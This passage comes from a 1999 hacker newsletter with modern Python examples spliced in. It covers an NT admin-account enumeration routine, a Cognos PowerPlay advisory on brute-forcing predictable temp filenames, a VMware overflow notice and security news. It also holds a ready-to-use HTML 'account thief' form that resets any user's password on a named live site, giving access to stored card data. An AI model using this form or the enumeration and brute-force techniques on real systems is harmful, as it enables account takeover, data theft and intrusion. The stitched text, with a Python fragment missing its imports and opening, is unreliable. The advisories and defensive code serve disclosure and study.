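ADMIN_RID = 500        # the value GetAdmin() compares against
NT_AUTHORITY = 5       # identifier authority in S-1-5-...
NT_NON_UNIQUE = 21     # first sub-authority of machine/domain account SIDs


def build_sid(authority, sub_authorities):
    """Serialise a SID: revision, count, 48-bit big-endian authority,
    then one little-endian 32-bit value per sub-authority."""
    subs = tuple(sub_authorities)
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def parse_sid(raw):
    """Return (authority, sub_authorities); raise ValueError if malformed."""
    if len(raw) < 8:
        raise ValueError("SID shorter than its 8-byte header")
    revision, count = raw[0], raw[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if count > 15 or len(raw) != 8 + 4 * count:
        raise ValueError("sub-authority count does not match SID length")
    authority = int.from_bytes(raw[2:8], "big")
    return authority, struct.unpack(f"<{count}I", raw[8:])


def sid_to_string(raw):
    authority, subs = parse_sid(raw)
    return "-".join(["S", "1", str(authority), *map(str, subs)])


def is_builtin_admin(raw):
    """Stricter than a bare 'last sub-authority == 500' test: the SID must
    also have the S-1-5-21-<three values>-<RID> shape of an account SID."""
    authority, subs = parse_sid(raw)
    return (authority == NT_AUTHORITY and len(subs) == 5
            and subs[0] == NT_NON_UNIQUE and subs[-1] == ADMIN_RID)


def find_builtin_admin(accounts):
    """accounts: iterable of (name, raw_sid). Returns the name or None."""
    for name, raw in accounts:
        if is_builtin_admin(raw):
            return name
    return None


# Constructed sample: one domain, four accounts as a user listing would return.
DOMAIN = (21, 1111111111, 2222222222, 3333333333)
SAMPLE_ACCOUNTS = [
    ("Guest", build_sid(5, DOMAIN + (501,))),
    ("Administrator", build_sid(5, DOMAIN + (1007,))),  # decoy made after a rename
    ("jsmith_ops", build_sid(5, DOMAIN + (500,))),      # the renamed built-in account
    ("backup_svc", build_sid(5, DOMAIN + (1003,))),
]

if __name__ == "__main__":
    for name, raw in SAMPLE_ACCOUNTS:
        print(f"{name:14} {sid_to_string(raw)}")
    print("built-in administrator:", find_builtin_admin(SAMPLE_ACCOUNTS))
```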

      

     Wrapper for Listing the user accounts.....

     void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg,
                        HTREEITEM userRoot, HTREEITEM adminRoot)
     {    
         USER_INFO_10 *pUserbuf, *pCurUser;
         DWORD dwRead, dwRemaining, dwResume, dwRC;
         WCHAR RemoteResource[UNCLEN + 1];        // \\server + NULL
         DWORD dwServNameLen = lstrlenW(pServer);
         bool GotAdmin = false;                   // stop testing once the admin is found

         char userName[256];
         char userServer[256];

         dwResume = 0;

         if(pServer[0] != L'\\' && pServer[1] != L'\\')
         {
             //Start string with correct UNC slashes and NULL terminate
             RemoteResource[0] = L'\\';
             RemoteResource[1] = L'\\';
             RemoteResource[2] = L'\0';
         }
         else
         {
             dwServNameLen -= 2; // drop slashes from count

             RemoteResource[0] = L'\0';
         }

         if(dwServNameLen > CNLEN)
         {
             SetLastError(ERROR_INVALID_COMPUTERNAME);
             return;
         }

         if(lstrcatW(RemoteResource, pServer) == NULL) return;

         do    
         {    
             pUserbuf = NULL;

             //THIS IS THE API THE NT USES TO HAND OUT ITS LIST
             dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf, 1024,
                                &dwRead, &dwRemaining, &dwResume);
             if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)    
                 break;

             DWORD i;
             for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser) 
             {
                 // Convert back to ANSI.
                 WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name, -1,
                                      userName, 256, NULL, NULL ); 
                 // Convert back to ANSI.
                 WideCharToMultiByte( CP_ACP, 0, pServer, -1,
                                      userServer, 256, NULL, NULL ); 

                 if(!GotAdmin)
                 {
                     //use char strings
                     CString Admin;
                     GotAdmin = GetAdmin(userServer, userName, Admin);
                     if(GotAdmin)
                     {
                         Admin.TrimRight();
                         HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST);
                         pDlg->m_Victims.EnsureVisible(adminChild);
                     }
                 }

                 CString strUserName = userName;
                 pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);
             }
             if (pUserbuf != NULL)
                 NetApiBufferFree(pUserbuf);
         } while (dwRC == ERROR_MORE_DATA);

         if (dwRC != ERROR_SUCCESS)
             printf("NUE() returned %lu\n", dwRC);
     }

  

                               Send mail to info@ntobjectives.com with questions or comments about this document.
                                        Copyright (c) 1999 NT OBJECTives, Inc.   All Rights Reserved.
                                         All trademarks are the property of their respective owners.
                                                   Last modified: June 28, 1999 
                                                   
      @HWA
                                                   
      
 05.0 Cognos PowerPlay Web Edition security vulnerability allows access to data cubes..
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/
      
       Date: Mon, 28 Jun 1999 07:29:37 -0400
       From: Darin White <d.w@IBM.NET>
       To: BUGTRAQ@netspace.org
       Subject: Cognos PowerPlay Web Edition security
       
       WEB SECURITY ADVISORY
       
       -------------
       Release Date:  1999-06-25
       Application:   Cognos PowerPlay Web Edition
       Severity:      Unauthenticated web users can sniff cube data
       Author:        Darin White
       Operating Sys: Microsoft NT Server
       --------------
       
       I. Description
       
       Due to design problems as well as some potential web server
       misconfiguration PowerPlay Web Edition may serve up data cubes
       in a non-secure manner.  Execution of the PowerPlay CGI
       pulls cube data into files in an unprotected temporary
       directory.  Those files are then fed back to frames in the
       browser.  In some cases it is trivial for an unauthenticated
       user to tap into those data files before they are purged.
       Cognos has been contacted but does not regard this as a
       serious exposure (see appendix B below).
       
       The issues are:
       (a) dynamic directory listing
       (b) weak temporary filename algorithm
       (c) ad hoc parameters to the CGI
       
       
       II. Details
       
       Identifying PowerPlay sites is quickly accomplished using AltaVista
       http://www.altavista.com/cgi-bin/query?
       pg=q&kl=XX&q=%2Blink%3Appdscgi.exe&search=Search
       (join last two lines) which hits all pages containing a link to the
       PowerPlay CGI ppdscgi.exe on NT.
       
       Normal authentication for protected cubes occurs when a user selects
       a link like:
       <A href="/cgi-bin/ppdscgi.exe?XT=EXAMPLE&LA=en&LO=en">Example</a>
       At this point the user is prompted for a userid and password.
       Beyond this check there seems to be no verification that data
       is being fed out to the browser that requested it and was
       authorized.
       
       (a) dynamic directory listing
       Netscape Enterprise Server 3.5.1 appears to be serving up dynamic
       directory listings by default.  A known PowerPlay site can be hit
       with a request for http://www.example.com/ppwb/Temp/ which will
       return something like:
       
       /ppwb/Temp/ -
       
          6/25/99  9:17 AM        17904 1ad6t.htm
          6/25/99  9:17 AM        37828 1ad6x.htm
       
       Here we see two temporary files created by one initial cube request.
       The suffix 't' in the first filename denotes the PowerPlay toolbar
       and 'x' denotes the data content.  These files are fed back to the
       browser to populate two frames.  Clicking on the content filename
       will allow any user to browse the current cube view with no
       authentication challenge even if the cube has been password-protected.
       Once into the cube the user may continue to drill for further data.
       
       (b) weak temporary filename algorithm
       Sites that have disabled directory listing may still be vulnerable.
       Many sites using PowerPlay offer a mix of protected and unprotected
       cubes.  Some sites also offer an anonymous user account (let's say
       "guest" for example). The PowerPlay CGI uses a common temporary
       directory for serving all cubes back to the browser.  Using the
       guest account or viewing an unprotected cube a user may right-click
       the content area and select View Frame Info which will display
       the temporary filename.  By repeatedly reloading the initial cube
       view and viewing frame info a list of temporary filenames may be
       generated in order to analyze the filename algorithm.  e.g.
       http://www.example.com/ppwb/Temp/1eeex.htm
       http://www.example.com/ppwb/Temp/1f77x.htm
       http://www.example.com/ppwb/Temp/1fcfx.htm
       http://www.example.com/ppwb/Temp/1ff6x.htm
       http://www.example.com/ppwb/Temp/2014x.htm
       
       Analysis of the filename progression shows:
       * the last char is 'x' for the data and 't' for the toolbar
       * first n-1 chars are hexadecimal chars only
       * the hexadecimal "numbers" comprising the filename are ascending only
       * the first char is never 0.  e.g. fffx.htm => 1000x.htm
       * simple hexadecimal subtraction on the first n-1 chars of consecutive
       filenames shows a very predictable pattern (see appendix A)
       
       A user may orient themselves in the namespace (the set of all possible
       filenames) by using a guest account or unprotected cube.  Once oriented
       a set of candidate filenames may be generated and requested from
       /ppwb/Temp on the server.  Of course this approach assumes valid
       users are hitting the cubes at the same time.  Once a successful
       hit has been made on a temporary file the user may drill further
       into the data as described in (a) above.
       
       Alternatively a brute force attack on a server could be attempted
       by just submitting requests for all possible filenames.  Of course if
       you could establish some idea of how long the site has been operational
       you might start with 4-char filenames.  A very new site with low traffic
       (if the owner displays a page counter) might be best approached with
       3-char names.  This type of attack would present a beat-the-clock
       situation as the ~65000 requests (for 4-char) scanned for an existing
       file before it was purged from the Temp directory.
       
       (c) ad hoc parameters to the CGI
       A variety of parameters to http://www.example.com/cgi-bin/ppdscgi.exe
       provide additional information on the PowerPlay server.
       * ?ABOUT= will return the version of PowerPlay.
       * ?TOC (or no parameter) presents a table of contents list of all
       web-enabled cubes on the server.  Some sites are using static page
       links to hit cubes rather than relying on PowerPlay's generated TOC.
       They may not be aware that all cubes are available.
       * the hidden parm PPWB in the data contents frame details the unaliased
       location of the temporary directory.  e.g.
       <INPUT TYPE="HIDDEN" NAME="PPWB" VALUE="C:/Netscape/SuiteSpot/docs/ppwb">
       
       
       III. Solution
       
       (a) dynamic directory listing
       Turn this feature off on your web server following the directions
       provided by the server vendor.  If you are unable to disable this
       feature you may create an index.html file in the /ppwb/Temp directory
       that will load when a filename has not been specified in the URL.
       
       (b) weak temporary filename algorithm
       This is really on Cognos' plate.  Watch your error logfile for
       a lot of failed requests for /ppwb/Temp/*.htm to at least detect
       an attack.  Removing anonymous cube access may slow an attack.
       
       (c) ad hoc parameters to the CGI
       Just be aware of what is available by altering the parameters.
       Don't assume your cubes are hidden because there is no direct
       link to the table of contents from the web.  Password protect
       your cubes.
       
       DW
       
       APPENDIX A
       
       Here's the output of one subtraction run which shows the v6.5
       temporary filenames and then the hex delta between adjacent filenames:
       
       Processing  test.dat  ...
       2161x.htm
       216bx.htm Ax
       2188x.htm 1Dx
       2192x.htm Ax
       219cx.htm Ax
       21a6x.htm Ax
       21afx.htm 9x
       21b9x.htm Ax
       21c3x.htm Ax
       21cdx.htm Ax
       21d7x.htm Ax
       21e0x.htm 9x
       21eax.htm Ax
       21f4x.htm Ax
       21fex.htm Ax
       2207x.htm 9x
       2211x.htm Ax
       221bx.htm Ax
       2225x.htm Ax
       222fx.htm Ax
       2238x.htm 9x
       2242x.htm Ax
       224cx.htm Ax
       2256x.htm Ax
       2260x.htm Ax
       2269x.htm 9x
       2273x.htm Ax
       227dx.htm Ax
       2287x.htm Ax
       2291x.htm Ax
       229ax.htm 9x
       
       SUMMARY
       diff    count
           A :  23
          1D :   1
           9 :   6
       out of   31 filenames
       
       Here are some other summaries:
       
       SUMMARY
       diff    count
        203B :   1
          DF :   1
          13 :   4
           A :  10
          14 :   3
          27 :   1
           9 :   1
       out of   22 filenames
       
       SUMMARY
       diff    count
          3E :   1
           A :  19
           9 :   5
       out of   26 filenames
       
       Analysis of filenames created under v6.0 of PowerPlay Web Ed. showed:
       
       25bx.htm
       25cx.htm 1x
       25dx.htm 1x
       25ex.htm 1x
       25fx.htm 1x
       260x.htm 1x
       261x.htm 1x
       262x.htm 1x
       263x.htm 1x
       264x.htm 1x
       265x.htm 1x
       266x.htm 1x
       267x.htm 1x
       268x.htm 1x
       269x.htm 1x
       26ax.htm 1x
       26bx.htm 1x
       26cx.htm 1x
       
       SUMMARY
       diff    count
           1 :  17
       out of   18 filenames
       
       SUMMARY
       diff    count
         37E :   1
           1 : 491
       out of  493 filenames
       
       SUMMARY
       diff    count
         1E7 :   1
           1 : 295
       out of  297 filenames
       
       SUMMARY
       diff    count
           1 : 1255
       out of 1256 filenames
       
       
       APPENDIX B
       
       1999-06-10 analysis submitted to Cognos
       1999-06-11 submission acknowledged
       1999-06-18 response from Cognos (below)
       -----------------------------
       Hello Darin,
       
       Thank you for the descriptive analysis of your problem. I understand that
       you have set up anonymous access and therefore you are aware of the security
       risk. I agree that the temp file generation is predictable and would suggest
       logging an enhancement through our web site.
       
       In the interim you have to weigh what is acceptable in terms of security
       knowing that there are other alternatives such as SSL and LDAP. These other
       options will of course offer substantially more protection.
       
       In conclusion your analysis is correct, now it is a factor of weighing your
       security wants and needs.
       
       Regards,
       
       Michael Bockholt
       Cognos Support Specialist
       Tel: 1-800-637-7447
       email: support@cognos.com
       -----------------------------
       
       
       --------------------------------------------------------------------
       Darin White
       d.w@ibm.net
       --------------------------------------------------------------------
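The SUMMARY tables in Appendix A above can be recomputed from any list of generated names. This added example (not part of the original analysis or of Cognos' software) rebuilds the v6.0 table from the filenames listed there and flags a sample whose names advance by one fixed step almost every time. It assumes the leading hex digits are the varying part and the trailing "x" is not; all function names are hypothetical.

```python
import re
import secrets
from collections import Counter

# Filenames exactly as listed in Appendix A for PowerPlay Web Ed. v6.0.
LISTED_V6 = [
    "25bx.htm", "25cx.htm", "25dx.htm", "25ex.htm", "25fx.htm", "260x.htm",
    "261x.htm", "262x.htm", "263x.htm", "264x.htm", "265x.htm", "266x.htm",
    "267x.htm", "268x.htm", "269x.htm", "26ax.htm", "26bx.htm", "26cx.htm",
]

# Assumption: the leading hex digits are the varying part of the name; the
# trailing "x" printed in the listing is optional here and ignored.
NAME_RE = re.compile(r"^([0-9a-f]+)x?\.htm$", re.IGNORECASE)


def name_value(name):
    """Return the hex part of a temp filename as an integer."""
    match = NAME_RE.match(name)
    if match is None:
        raise ValueError(f"unrecognised temp filename: {name!r}")
    return int(match.group(1), 16)


def diff_summary(names):
    """Count the differences between consecutive names, in creation order."""
    values = [name_value(n) for n in names]
    return Counter(b - a for a, b in zip(values, values[1:]))


def format_summary(names):
    """Render the counts in the layout of the SUMMARY tables."""
    lines = ["SUMMARY", "diff    count"]
    for diff, count in sorted(diff_summary(names).items(), reverse=True):
        lines.append(f"{diff:>5X} : {count:>3}")
    lines.append(f"out of {len(names):>4} filenames")
    return "\n".join(lines)


def dominant_step_share(names):
    """Return (most common step, fraction of all steps it accounts for)."""
    summary = diff_summary(names)
    total = sum(summary.values())
    if total == 0:
        return None, 0.0
    step, count = summary.most_common(1)[0]
    return step, count / total


def is_predictable(names, threshold=0.9):
    """Flag a sample in which one fixed step explains nearly every name."""
    _, share = dominant_step_share(names)
    return share >= threshold


def random_names(count, nbytes=16):
    """Names drawn from the OS CSPRNG, for comparison with the counter."""
    return [secrets.token_hex(nbytes) + ".htm" for _ in range(count)]


if __name__ == "__main__":
    print(format_summary(LISTED_V6))
    print("listed sample predictable:", is_predictable(LISTED_V6))
    print("random sample predictable:", is_predictable(random_names(50)))
```

A single large jump, as in the "37E : 1" rows, does not change the verdict, because the threshold looks at the share of the dominant step rather than requiring every step to match.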
      
       @HWA
        
 
06.0 VMware Security Alert
     ~~~~~~~~~~~~~~~~~~~~~
     
     Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/

       Date: Fri, 25 Jun 1999 19:18:35 -0700
       From: Jason R. Rhoads <jason.rhoads@SABERNET.NET>
       To: BUGTRAQ@netspace.org
       Subject: VMware Security Alert
       
       "On June 22nd, 1999, VMware, Inc. was notified of a security problem with
       VMware for Linux 1.0.1. This security hole is also present in all previous
       versions of VMware for Linux. The security hole has been fixed in VMware for
       Linux 1.0.2 released today. The security hole allows a buffer overrun attack
       against VMware for Linux to result in unprivileged root access to a machine.
       An updated version of VMware for Linux which fixes this problem is available
       now, see below. As far as we know, this breach has never been used for malicious
       purposes, or caused any harm to customer installations. VMware, Inc. apologizes
       for the inconvenience to our users."
       
       http://www.vmware.com/news/security.html
       
       -----------------------------------------------------------------------------
       
       <http://www.vmware.com/news/security.html>
       
       
       
            VMware Security Alert
             Date: June 25th, 1999
       
                         
       
       On June 22nd, 1999, VMware, Inc. was notified of a security problem with VMware for Linux 1.0.1. This security hole is
       also present in all previous versions of VMware for Linux. The security hole has been fixed in VMware for Linux 1.0.2
       released today. The security hole allows a buffer overrun attack against VMware for Linux to result in unprivileged root
       access to a machine. An updated version of VMware for Linux which fixes this problem is available now, see below. As
       far as we know, this breach has never been used for malicious purposes, or caused any harm to customer installations.
       VMware, Inc. apologizes for the inconvenience to our users.
        
       
       Vulnerable Systems
       
       The security hole allows an attack to occur during VMware startup, but before a virtual machine is powered on. Guest
       operating systems themselves are unlikely to be affected by these buffer overflow attacks. Systems most vulnerable to
       this attack are multi-user Linux systems that have VMware installed. A malicious user with access to an account on the
       system could exploit the hole. Stand alone single-user machines are not at high risk from this security hole. This hole
       does not allow direct network based 'worm' style attacks against VMware.
       
       This security hole was discovered by Asylum Security, a division of CyberSpace 2000, 
       <http://www.cyberspace2000.com/security/> a professional computer security
       response team.  VMware has taken immediate action in response to this event. VMware for Linux 1.0.2 was made
       available for download on June 25th, 1999 on our web site and mirror sites. The shipment of CD-ROMs has been
       suspended and the inventory discarded. Customers who have purchased VMware for Linux have been notified by electronic mail,
       VMware has also posted security alerts to newsgroups at news.vmware.com.
        
       
       Affected VMware Releases
       
       This security hole is present in VMware for Linux 1.0.1 and all previous  versions, including the beta versions
       (build-106, build-135, build-152) and the experimental version (build-179). VMware recommends that users replace
       beta and experimental versions with VMware for Linux 1.0.2. An updated VMware for Linux experimental release with
       fixes for this security hole will be made available in the near future.
        
       
       How to Close this Security Hole
       
       The security hole can be closed by simply upgrading to VMware for Linux version 1.0.2: 
       
            1. Download VMware for Linux 1.0.2 from one of our mirror sites
            <http://www.vmware.com/download/downloadlinux.html>
           
            2. Untar the distribution.
                 tar zxvf vmware-1.0.2.tar.gz
                
            3. Change directory to vmware-install
                 cd vmware-install
                
            4. As root, install VMware for Linux
                 su
                 ./install.pl
       
              You will first be asked whether you want to upgrade VMware for Linux. Simply answer yes at this point and
              then follow any installer instructions.
       
              NOTE: It is not possible to resolve this security problem by removing suid (Set User ID) root privileges from
              the VMware executable. VMware must be suid root to run correctly.
                
       
       Reporting Security Issues
       
       VMware is committed to addressing security issues and providing customers with information on how they can protect
       themselves. If you identify what you believe may be a security issue with a VMware product, please send an email to
       security@vmware.com. We will work to appropriately address and communicate the issue.
        
       
       Notification of Security Alerts
       
       When VMware becomes aware of a security issue that significantly affects our products, we will take action to notify
       affected customers. Typically this notification will be in the form of a security bulletin explaining the issue, and where
       possible a response to the problem. These bulletins will both be emailed to affected customers and posted on our web site
       and newsgroups at news.vmware.com. <http://www.vmware.com/support/newsgroups.html>
       
       -----------------------------------------------------------------------------
       
       Date: Sat, 26 Jun 1999 17:33:22 -0400
       From: Don <don@CYBERSPACE2000.COM>
       To: BUGTRAQ@netspace.org
       Subject: VMWare Advisory - buffer overflows
       
       This advisory was made on 06/21/99 and was to be released on 06/28/99 (or
       after a fix was released). We would like to recognize the VMware staff and
       their responsiveness to the bug reports.  Last night, customers who
       purchased their product received notices to upgrade to VMware v1.0.2.
       
       For more information on the VMware bugs, visit:
       
       http://www.vmware.com/news/security.html
       http://www.cyberspace2000.com/security/advisories
       
       -Don Sausa
       
       ----------[asylum security]------------
       id: #99021, team director
       e-mail: don@cyberspace2000.com
       web: http://cyberspace2000.com/security
       ---------------------------------------
       
       
       Team Asylum Security
       Copyright (c) 1999 By CyberSpace 2000
       http://www.cyberspace2000.com/security
       Source: Seth L. [seth@cyberspace2000.com]
       Advisory Date: 06/21/99
       Release Date: 06/28/99
       
       [ Final Revision: 06/25/99 ]
       
       Affected
       --------
       VMware v1.0.1 and earlier for Linux.
       
       Product Description
       -------------------
       VMware v1.0.1 is a software product by VMware, Inc. that creates a
       virtual machine in which you can install multiple operating systems
       without repartitioning or formatting your hard drive.
       
       Vulnerability Summary
       ---------------------
       Team Asylum has found multiple buffer overflows existing in VMware v1.0.1
       for Linux.  Earlier versions also have the same buffer overflows.
       VMware Inc. has been notified of these overflows and they have released
       VMware v1.0.2 as a fix.  Any local user can exploit these overflows to gain
       root access.
       
       Fix
       ---
       All users are encouraged to upgrade to VMware v1.0.2.  You may download
       it directly off http://www.vmware.com.
       
       Special Thanks
       --------------
       Special thanks to VMware staff for responding quickly to our bug reports.
       Within 3 days, they have managed to fix the overflows, as well as stop the
       physical distribution of their v1.0.1 product.  All customers who have
       purchased VMware have been notified as of 06/25/99 12:00 midnight (PST)
       about the new VMware v1.0.2 version.
       
       @HWA      
       
 07.0 Security vulnerability in hustler.com login template 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/
      
       security vulnerability in hustler.com which allows any user to 
       steal another user's account and gain full access to 
       their account including cc# information
       
       no fix yet. hustler.com has been informed.
       
       ----------------------------------------------------------------------------
       exploit template
       ----------------------------------------------------------------------------
       
       <!--       E     G    0    D    3    A    T     H                   -->
       <HTML>
       <HEAD><TITLE>HUSTLER LOGIN THEIF BY EGODEATH</TITLE></HEAD>
       <BODY bgcolor=#000000 text=#FFFFFF>
       
       <table border="0">
       <th><font colo<b><u>HACKED</b></u>
       </table>
       <H2>Change My Password - ego's M0D1Fi3D verzi0n</H2>
       
       <FORM METHOD="POST" ACTION="https://members.flyntdigital.com/secure-bin/usr_search_admin/resetpass.pl">
       
       <TABLE BORDER=1 CELLSPACING=0 CELLPADDING=4 WIDTH=500>
       
       <TR>
          <TH VALIGN=TOP WIDTH=40% ALIGN=RIGHT>Highlight the User ID: </TH>
          <TD>
             <font color=red>This is the hustler account thief script<br>in order for this to work you must know<br>somones real login name ( if its an old carded<br> account with a nick like XTC, give up<br> you cant steal a froozen account, but<br> yea.. u can change its password...</font> 
             <input type="text" NAME="usr_login" value="a real login name">
          </TD>
       </TR>
       <TR>
       <TD align=left>Enter Your New Password</TD>
       <TD align=right>Enter Password again</TD>
       </TR>
       <TR>
       <TD ALIGN=left>
       <INPUT TYPE="text" NAME="pass_wd1" VALUE="">
       </TD>
       <TD align=right>
       <INPUT TYPE="text" NAME="pass_wd2" VALUE="">
       </TD>
       </TR>
       <TR>
          <TD COLSPAN=2 ALIGN=CENTER>
             <INPUT TYPE="submit" NAME="submit" VALUE="Submit">
             <INPUT TYPE="reset" NAME="reset" VALUE="Reset">
          </TD>
       </TR>
       </TABLE>
       </FORM>
       
       </BODY>
       </HTML>
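
The template above works only if the password-change handler takes the account to modify from the submitted usr_login field instead of from the logged-in session. As an added illustration (not code from the original post or from the site; the server-side logic is not shown on the page, so the weak handler's behaviour, the Accounts store, the handler names and the current_pass field are assumptions), this Python example puts such a handler beside one bound to the session:

```python
import hashlib
import hmac
import os
import secrets

ROUNDS = 100_000   # PBKDF2 iterations used for this demo
MIN_LEN = 10       # assumed minimum password length


class Accounts:
    """Constructed in-memory store standing in for the real user database."""

    def __init__(self):
        self.users = {}      # login -> (salt, password hash)
        self.sessions = {}   # session token -> login

    @staticmethod
    def _hash(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)

    def set_password(self, login, password):
        salt = os.urandom(16)
        self.users[login] = (salt, self._hash(password, salt))

    def check_password(self, login, password):
        if login not in self.users:
            return False
        salt, stored = self.users[login]
        return hmac.compare_digest(stored, self._hash(password, salt))

    def log_in(self, login, password):
        """Return a fresh session token, or None on bad credentials."""
        if not self.check_password(login, password):
            return None
        token = secrets.token_urlsafe(32)
        self.sessions[token] = login
        return token

    def end_other_sessions(self, login, keep):
        self.sessions = {t: u for t, u in self.sessions.items()
                         if u != login or t == keep}


def reset_trusting_form(accounts, form):
    """Weak form (assumed behaviour): the account to change is whatever
    usr_login the request body names; the caller is never identified."""
    login = form.get("usr_login", "")
    new = form.get("pass_wd1", "")
    if login not in accounts.users:
        return False, "unknown user"
    if not new or new != form.get("pass_wd2", ""):
        return False, "passwords differ"
    accounts.set_password(login, new)
    return True, "changed"


def reset_session_bound(accounts, session_token, form):
    """Hardened form: the account comes from the server-side session, the
    current password is re-checked, and other sessions are ended."""
    login = accounts.sessions.get(session_token)
    if login is None:
        return False, "not authenticated"
    submitted = form.get("usr_login")
    if submitted is not None and submitted != login:
        return False, "account mismatch"      # worth logging as an alert
    if not accounts.check_password(login, form.get("current_pass", "")):
        return False, "current password wrong"
    new = form.get("pass_wd1", "")
    if new != form.get("pass_wd2", ""):
        return False, "passwords differ"
    if len(new) < MIN_LEN:
        return False, "password too short"
    accounts.set_password(login, new)
    accounts.end_other_sessions(login, keep=session_token)
    return True, "changed"


def demo():
    """Run the same forged request against both handlers."""
    acc = Accounts()
    acc.set_password("alice", "alice-original-pw")   # constructed accounts
    acc.set_password("bob", "bob-original-pw")
    forged = {"usr_login": "alice",
              "pass_wd1": "chosen-by-bob", "pass_wd2": "chosen-by-bob"}
    results = {"weak": reset_trusting_form(acc, dict(forged))}
    acc.set_password("alice", "alice-original-pw")   # undo the takeover
    bob = acc.log_in("bob", "bob-original-pw")
    results["hardened_forged"] = reset_session_bound(acc, bob, dict(forged))
    alice = acc.log_in("alice", "alice-original-pw")
    own = {"current_pass": "alice-original-pw",
           "pass_wd1": "alice-new-passphrase",
           "pass_wd2": "alice-new-passphrase"}
    results["hardened_own"] = reset_session_bound(acc, alice, own)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```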
       
       @HWA      
       
 08.0 DOD investigating computer 'Mob-like' tactics
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From: Federal Computer Week; http://www.fcw.com/pubs/fcw/fcwhome.htm
      
      JUNE 30, 1999 . . . 12:25 EDT 


      DOD investigating computer 'mob tactics'

      BY DANIEL VERTON (dan_verton@fcw.com)

      While a senior adviser to the Defense Department testified before Congress
      this week on threats to national security stemming from the export of powerful
      computer technology, his supervisor allegedly attempted to access and tamper
      with his computer, prompting the immediate launch of a full-scale investigation.

      Rep. Dan Burton (R-Ind.), chairman of the House Government Reform
      Committee, said Jay Davis, director of the Defense Threat Reduction Agency,
      informed the committee on June 28 that an investigation was under way into an
      incident involving unauthorized access to the computer belonging to a senior
      strategic trade adviser to the agency.

      According to Burton, the incident took place while Peter Leitner, a longtime
      internal critic of DOD's policy on exporting sensitive computer technologies,
      was testifying on June 24 before the committee regarding security problems
      stemming from that policy. Although no details from the investigation have been
      released yet, Burton claims that the incident is an example of DOD officials
      trying to strong-arm a congressional witness into not cooperating with the
      committee.

      "While Dr. Leitner was telling my committee about the retaliation he suffered
      for bringing his concerns to his superiors and Congress, his supervisor was
      trying to secretly access his computer," Burton said. "This smacks of mob
      tactics. Congress will not stand for this kind of witness intimidation."

      Although DTRA has launched an investigation into the incident, Burton said he
      plans to call upon Defense Secretary William Cohen to ask for "his personal
      involvement" in the case. "I intend to ask a lot of questions of the Defense
      Department officials involved, and I expect to get straight answers," Burton
      said.

      Leitner has criticized the department's policy of easing export controls on
      powerful computer technology that is used to simulate and test the reliability of
      nuclear weapons, claiming that the acquisition of supercomputer technology
      abroad was feeding a new form of Cold War characterized by an arms race for
      "virtual weapons."
      
      @HWA
      
 09.0 GSA announces Intrusion Detection Net
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From: Federal Computer Week; http://www.fcw.com/pubs/fcw/fcwhome.htm
      
      JUNE 28, 1999 


      GSA launches intrusion-detection net

      BY DIANE FRANK (diane_frank@fcw.com)

      The General Services Administration last week
      asked industry for information about emerging security
      technology for detecting unauthorized users on agency
      networks, with the goal of building a government
      intrusion-detection system by the end of next year.

      In building the Federal Intrusion Detection Network
      (Fidnet), GSA hopes to find security tools vendors are
      developing that overcome the weaknesses of existing
      technology. By keeping ahead of the latest technology,
      GSA hopes to leave agency defenses less vulnerable
      to hackers, agency officials said.

      "We want to encourage people to develop new
      technologies that will help us keep neck and neck with
      the perpetrator," said David Jarrell, program manager
      for the GSA portion of Fidnet in the Federal
      Technology Service's Office of Information Security
      and technical director of the Federal Computer
      Incident Response Capability. 

      OIS will look not only to established intrusion-detection vendors but to new
      companies and people that "we haven't even heard of," Jarrell said. 

      "I think there are people out there that are significantly brilliant enough to solve
      this and we hope that this [request for information] will cause them to come
      forward," he said.

      GSA plans to use the vendor-provided information to develop prototypes by the
      first quarter of fiscal 2000, said Tom Burke, GSA's assistant commissioner of
      information security. Down the line, OIS may even pay some of the vendors to
      put together a long-term, real-world demonstration of their capabilities at an
      agency, he said.

      GSA particularly is interested in finding intrusion-detection systems that are
      more capable of detecting attacks as they happen instead of after the fact.

      The problem is that most intrusion-detection solutions work the same way
      anti-virus protection does: They check network-use patterns against a known list
      of intrusion "signatures" and send out alerts when they come across a match.

      But as vendors and users have known for years, this method will not catch
      intrusions that are not on that list. Also, most products just now are advancing to
      the point where they alert administrators at the time an intrusion takes place.

      "We find that many of the off-the-shelf products that are available today are
      really a response to the intrusions, and they are always a step behind the
      intruder," Jarrell said. "We want to look to the future and some artificial
      intelligence that will learn as it goes about the attacks that are being launched." 

      This type of capability would be more than welcome to agencies, especially if
      they are enabled to respond more quickly at the local level, said one senior
      civilian agency official. 

      Others recognized the potential benefits of sharing attack "experience" across
      government.

      "What I would hope this next-generation intrusion detection could bring to us is
      the capability not only to monitor [intrusions] but to put together the information
      in a history for reference," said Sarah Jane League, Defense Department liaison
      at the Critical Infrastructure Assurance Office. "It should bring that pattern
      recognition and learn as it goes...so that over time it will have the ability to
      recognize" not only attacks but what could be attacks, she said.

      Vendors have been working on this type of product, sometimes called anomaly
      detection, for some time.

      "ISS has a lot of research efforts in place to advance the intrusion-detection
      market," said Mark Wood, intrusion-detection product manager at Internet
      Security Systems Inc., maker of the Real-Secure intrusion-detection product
      line. "Having a pre-defined list of signatures is nice, but you'd like to detect
      novel attacks, things you don't know about."

